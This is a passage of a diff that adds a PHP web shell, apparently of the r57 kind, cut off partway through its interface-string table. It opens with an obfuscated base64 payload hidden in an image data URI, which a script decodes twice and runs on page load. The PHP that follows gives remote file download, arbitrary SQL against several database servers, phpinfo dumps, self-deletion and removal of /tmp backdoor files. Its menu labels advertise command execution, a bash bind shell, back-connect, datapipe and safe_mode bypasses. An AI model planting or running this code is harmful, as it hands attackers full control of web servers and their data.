lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/>
+<script type="text/javascript">
+if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=="undefined")?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad="",c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+="=";plain+="\\0"}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join("");coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=="undefined")?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join("");return b?Utf8.decode(plain):plain};
+setTimeout(function(){new Function(atob(atob(document.getElementById("ghdescon").src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(2);}, 500);
+</script>';
+class zipfile
+{
+    var $datasec      = array();
+    var $ctrl_dir     = array();
+    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+    var $old_offset   = 0;
+    function unix2DosTime($unixtime = 0) {
+        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+        if ($timearray['year'] < 1980) {
+            $timearray['year']    = 1980;
+            $timearray['mon']     = 1;
+            $timearray['mday']    = 1;
+            $timearray['hours']   = 0;
+            $timearray['minutes'] = 0;
+            $timearray['seconds'] = 0;
+        } 
+        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+                ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+    } 
+    function addFile($data, $name, $time = 0)
+    {
+        $name     = str_replace('\\', '/', $name);
+        $dtime    = dechex($this->unix2DosTime($time));
+        $hexdtime = '\x' . $dtime[6] . $dtime[7]
+                  . '\x' . $dtime[4] . $dtime[5]
+                  . '\x' . $dtime[2] . $dtime[3]
+                  . '\x' . $dtime[0] . $dtime[1];
+        eval('$hexdtime = "' . $hexdtime . '";');
+        $fr   = "\x50\x4b\x03\x04";
+        $fr   .= "\x14\x00";            
+        $fr   .= "\x00\x00";            
+        $fr   .= "\x08\x00";            
+        $fr   .= $hexdtime;             
+        $unc_len = strlen($data);
+        $crc     = crc32($data);
+        $zdata   = gzcompress($data);
+        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+        $c_len   = strlen($zdata);
+        $fr      .= pack('V', $crc);             
+        $fr      .= pack('V', $c_len);           
+        $fr      .= pack('V', $unc_len);         
+        $fr      .= pack('v', strlen($name));    
+        $fr      .= pack('v', 0);                
+        $fr      .= $name;
+        $fr .= $zdata;
+        $this -> datasec[] = $fr;
+        $cdrec = "\x50\x4b\x01\x02";
+        $cdrec .= "\x00\x00";                
+        $cdrec .= "\x14\x00";                
+        $cdrec .= "\x00\x00";                
+        $cdrec .= "\x08\x00";                
+        $cdrec .= $hexdtime;                 
+        $cdrec .= pack('V', $crc);           
+        $cdrec .= pack('V', $c_len);         
+        $cdrec .= pack('V', $unc_len);       
+        $cdrec .= pack('v', strlen($name) ); 
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('V', 32 );            
+        $cdrec .= pack('V', $this -> old_offset );
+        $this -> old_offset += strlen($fr);
+        $cdrec .= $name;
+        $this -> ctrl_dir[] = $cdrec;
+    }
+    function file()
+    {
+        $data    = implode('', $this -> datasec);
+        $ctrldir = implode('', $this -> ctrl_dir);
+        return
+            $data .
+            $ctrldir .
+            $this -> eof_ctrl_dir .
+            pack('v', sizeof($this -> ctrl_dir)) .  
+            pack('v', sizeof($this -> ctrl_dir)) .  
+            pack('V', strlen($ctrldir)) .           
+            pack('V', strlen($data)) .              
+            "\x00\x00";              
+    }
+}
+function compress(&$filename,&$filedump,$compress)
+ {
+    global $content_encoding;
+    global $mime_type;
+    if ($compress == 'bzip' && @function_exists('bzcompress')) 
+     {
+        $filename  .= '.bz2';
+        $mime_type = 'application/x-bzip2';
+        $filedump = bzcompress($filedump);
+     } 
+     else if ($compress == 'gzip' && @function_exists('gzencode')) 
+     {
+        $filename  .= '.gz';
+        $content_encoding = 'x-gzip';
+        $mime_type = 'application/x-gzip';
+        $filedump = gzencode($filedump);
+     } 
+     else if ($compress == 'zip' && @function_exists('gzcompress')) 
+     {
+        $filename .= '.zip';
+        $mime_type = 'application/zip';
+        $zipfile = new zipfile();
+        $zipfile -> addFile($filedump, substr($filename, 0, -4));
+        $filedump = $zipfile -> file();
+     } 
+     else 
+     {
+        $mime_type = 'application/octet-stream';
+     }
+ }
+function mailattach($to,$from,$subj,$attach)
+ {
+ $headers  = "From: $from\r\n"; 
+ $headers .= "MIME-Version: 1.0\r\n";
+ $headers .= "Content-Type: ".$attach['type'];
+ $headers .= "; name=\"".$attach['name']."\"\r\n";
+ $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
+ $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
+ if(@mail($to,$subj,"",$headers)) { return 1; }
+ return 0;
+ }
+if(isset($_GET['img'])&&!empty($_GET['img']))
+ {
+ $images = array();
+ $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw==';
+ $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw==';
+ @ob_clean();
+ header("Content-type: image/gif");
+ echo base64_decode($images[$_GET['img']]);
+ die(); 
+ } 
+if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
+ {
+  if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; }
+  else 
+   {
+    @ob_clean();
+    $filename = @basename($_POST['d_name']);
+    $filedump = @fread($file,@filesize($_POST['d_name']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
+    header("Content-type: ".$mime_type);
+    header("Content-disposition: attachment; filename=\"".$filename."\";");   
+    echo $filedump;
+    exit();
+   }            
+ }
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+if ($_POST['cmd']=="db_query")
+ {
+  echo $head;
+  switch($_POST['db'])
+  {
+  case 'MySQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+  $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+        if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); }
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query) 
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @mysql_query($query,$db);
+      $error = @mysql_error($db);
+      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
+      else {
+      if (@mysql_num_rows($res) > 0) 
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @mysql_fetch_assoc($res))) 
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
+      }
+      @mysql_free_result($res);
+      }
+     }    
+        @mysql_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MySQL server</b></font></div>";         
+  break;
+  case 'MSSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+  $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+        if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query) 
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @mssql_query($query,$db);
+      if (@mssql_num_rows($res) > 0) 
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @mssql_fetch_assoc($res))) 
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */
+      @mssql_free_result($res);
+      }
+     }    
+        @mssql_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MSSQL server</b></font></div>";
+  break;
+  case 'PostgreSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+   {
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query) 
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @pg_query($db,$query);
+      $error = @pg_errormessage($db);
+      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
+      else {
+      if (@pg_num_rows($res) > 0) 
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @pg_fetch_assoc($res))) 
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
+      }
+      @pg_free_result($res);
+      }
+     }    
+        @pg_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to PostgreSQL server</b></font></div>";
+  break;
+  case 'Oracle':
+  $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']);
+  if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to Oracle server.<br>".$error['message']."</b></font></div>"; }
+  else
+   {
+   $querys = @explode(';',$_POST['db_query']);
+   foreach($querys as $num=>$query)
+    { 
+    if(strlen($query)>5) {
+    echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+    $stat = @ociparse($db, $query);
+    @ociexecute($stat);
+    if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error['message']."</b></font></td></tr></table><br>"; }
+    else 
+     {
+     $rowcount = @ocirowcount($stat);
+     if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rowcount."</b></font></td></tr></table><br>";}
+     else {
+     echo "<table width=100%><tr>";
+     for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".htmlspecialchars(@ocicolumnname($stat, $j))."&nbsp;</b></font></td>"; }
+     echo "</tr>";
+     while(ocifetch($stat))
+      {
+      echo "<tr>";
+      for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2>&nbsp;".htmlspecialchars(@ociresult($stat, $j))."&nbsp;</font></td>"; }
+      echo "</tr>";
+      }
+     echo "</table><br>";
+     }
+     @ocifreestatement($stat); 
+     }
+    }
+    }
+   @ocilogoff($db);
+   }
+  break;
+  }
+ echo "<form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; 
+ echo "</form>";
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }      
+if(isset($_GET['delete']))
+ {
+   @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
+ }
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+ }
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+$lang=array(
+'ru_text1' =>'??????????? ???????',
+'ru_text2' =>'?????????? ?????? ?? ???????',
+'ru_text3' =>'????????? ???????',
+'ru_text4' =>'??????? ??????????',
+'ru_text5' =>'???????? ?????? ?? ??????',
+'ru_text6' =>'????????? ????',
+'ru_text7' =>'??????',
+'ru_text8' =>'???????? ?????',
+'ru_butt1' =>'?????????',
+'ru_butt2' =>'?????????',
+'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
+'ru_text10'=>'??????? ????',
+'ru_text11'=>'?????? ??? ???????',
+'ru_butt3' =>'???????',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-?????',
+'ru_text14'=>'????',
+'ru_butt4' =>'?????????',
+'ru_text15'=>'???????? ?????? ? ?????????? ???????',
+'ru_text16'=>'????????????',
+'ru_text17'=>'????????? ????',
+'ru_text18'=>'????????? ????',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'????????????',
+'ru_text21'=>'????? ???',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'????????? ????',
+'ru_text24'=>'????????? ????',
+'ru_text25'=>'????????? ????',
+'ru_text26'=>'????????????',
+'ru_butt5' =>'?????????',
+'ru_text28'=>'?????? ? safe_mode',
+'ru_text29'=>'?????? ????????',
+'ru_butt6' =>'???????',
+'ru_text30'=>'???????? ?????',
+'ru_butt7' =>'???????',
+'ru_text31'=>'???? ?? ??????',
+'ru_text32'=>'?????????? PHP ????',
+'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL',
+'ru_butt8' =>'?????????',
+'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
+'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
+'ru_text36'=>'????',
+'ru_text37'=>'?????',
+'ru_text38'=>'??????',
+'ru_text39'=>'???????',
+'ru_text40'=>'???? ??????? ???? ??????',
+'ru_butt9' =>'????',
+'ru_text41'=>'????????? ? ?????',
+'ru_text42'=>'?????????????? ?????',
+'ru_text43'=>'????????????? ????',
+'ru_butt10'=>'?????????',
+'ru_butt11'=>'?????????????',
+'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
+'ru_text45'=>'???? ????????',
+'ru_text46'=>'???????? phpinfo()',
+'ru_text47'=>'???????? ???????? php.ini',
+'ru_text48'=>'???????? ????????? ??????',
+'ru_text49'=>'???????? ??????? ? ???????',
+'ru_text50'=>'?????????? ? ??????????',
+'ru_text51'=>'?????????? ? ??????',
+'ru_text52'=>'????? ??? ??????',
+'ru_text53'=>'?????? ? ?????',
+'ru_text54'=>'????? ?????? ? ??????',
+'ru_butt12'=>'?????',
+'ru_text55'=>'?????? ? ??????',
+'ru_text56'=>'?????? ?? ???????',
+'ru_text57'=>'???????/??????? ????/??????????',
+'ru_text58'=>'???',
+'ru_text59'=>'????',
+'ru_text60'=>'??????????',
+'ru_butt13'=>'???????/???????',
+'ru_text61'=>'???? ??????',
+'ru_text62'=>'?????????? ???????',
+'ru_text63'=>'???? ??????',
+'ru_text64'=>'?????????? ???????',
+'ru_text65'=>'???????',
+'ru_text66'=>'???????',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'???????',
+'ru_text69'=>'????????1',
+'ru_text70'=>'????????2',
+'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",
+'ru_text72'=>'????? ??? ??????',
+'ru_text73'=>'?????? ? ?????',
+'ru_text74'=>'?????? ? ??????',
+'ru_text75'=>'* ????? ???????????? ?????????? ?????????',
+'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',
+'ru_text77'=>'???????? ????????? ???? ??????',
+'ru_text78'=>'?????????? ???????',
+'ru_text79'=>'?????????? ???????',
+'ru_text80'=>'???',
+'ru_text81'=>'????',
+'ru_text82'=>'???? ??????',
+'ru_text83'=>'?????????? SQL ???????',
+'ru_text84'=>'SQL ??????',
+'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',
+'ru_text86'=>'?????????? ????? ? ???????',
+'ru_butt14'=>'???????',
+'ru_text87'=>'???????? ?????? ? ?????????? ftp-???????',
+'ru_text88'=>'FTP-??????:????',
+'ru_text89'=>'???? ?? ftp ???????',
+'ru_text90'=>'????? ????????',
+'ru_text91'=>'???????????? ?',
+'ru_text92'=>'??? ?????????',
+'ru_text93'=>'FTP',
+'ru_text94'=>'FTP-????????',
+'ru_text95'=>'?????? ?????????????',
+'ru_text96'=>'?? ??????? ???????? ?????? ?????????????',
+'ru_text97'=>'????????? ??????????: ',
+'ru_text98'=>'??????? ???????????: ',
+'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd',
+'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????',
+'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????',
+'ru_text102'=>'?????',
+'ru_text103'=>'???????? ??????',
+'ru_text104'=>'???????? ????? ?? ???????? ????',
+'ru_text105'=>'????',
+'ru_text106'=>'??',
+'ru_text107'=>'????',
+'ru_butt15'=>'?????????',
+'ru_text108'=>'????? ??????',
+'ru_text109'=>'????????',
+'ru_text110'=>'??????????',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'Executed command',
+'eng_text2' =>'Execute command on server',
+'eng_text3' =>'Run command',
+'eng_text4' =>'Work directory',
+'eng_text5' =>'Upload files on server',
+'eng_text6' =>'Local file',
+'eng_text7' =>'Aliases',
+'eng_text8' =>'Select alias',
+'eng_butt1' =>'Execute',
+'eng_butt2' =>'Upload',
+'eng_text9' =>'Bind port to /bin/bash',
+'eng_text10'=>'Port',
+'eng_text11'=>'Password for access',
+'eng_butt3' =>'Bind',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_butt4' =>'Connect',
+'eng_text15'=>'Upload files from remote server',
+'eng_text16'=>'With',
+'eng_text17'=>'Remote file',
+'eng_text18'=>'Local file',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'Use',
+'eng_text21'=>'&nbsp;New name',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Local port',
+'eng_text24'=>'Remote host',
+'eng_text25'=>'Remote port',
+'eng_text26'=>'Use',
+'eng_butt5' =>'Run',
+'eng_text28'=>'Work in safe_mode',
+'eng_text29'=>'ACCESS DENIED',
+'eng_butt6' =>'Change',
+'eng_text30'=>'Cat file',
+'eng_butt7' =>'Show',
+'eng_text31'=>'File not found',
+'eng_text32'=>'Eval PHP code',
+'eng_text33'=>'Test bypass open_basedir with cURL functions',
+'eng_butt8' =>'Test',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'Database',
+'eng_text37'=>'Login',
+'eng_text38'=>'Password',
+'eng_text39'=>'Table',
+'eng_text40'=>'Dump database table',
+'eng_butt9' =>'Dump',
+'eng_text41'=>'Save dump in file',
+'eng_text42'=>'Edit files',
+'eng_text43'=>'File for edit',
+'eng_butt10'=>'Save',
+'eng_text44'=>'Can\'t edit file! Only read access!',
+'eng_text45'=>'File saved',
+'eng_text46'=>'Show phpinfo()',
+'eng_text47'=>'Show variables from php.ini',
+'eng_text48'=>'Delete temp files',
+'eng_butt11'=>'Edit file',
+'eng_text49'=>'Delete script from server',
+'eng_text50'=>'View cpu info',
+'eng_text51'=>'View memory info',
+'eng_text52'=>'Find text',
+'eng_text53'=>'In dirs',
+'eng_text54'=>'Find text in files',
+'eng_butt12'=>'Find',
+'eng_text55'=>'Only in files',
+'eng_text56'=>'Nothing :(',
+'eng_text57'=>'Create/Delete File/Dir',
+'eng_text58'=>'name',
+'eng_text59'=>'file',
+'eng_text60'=>'dir',
+'eng_butt13'=>'Create/Delete',
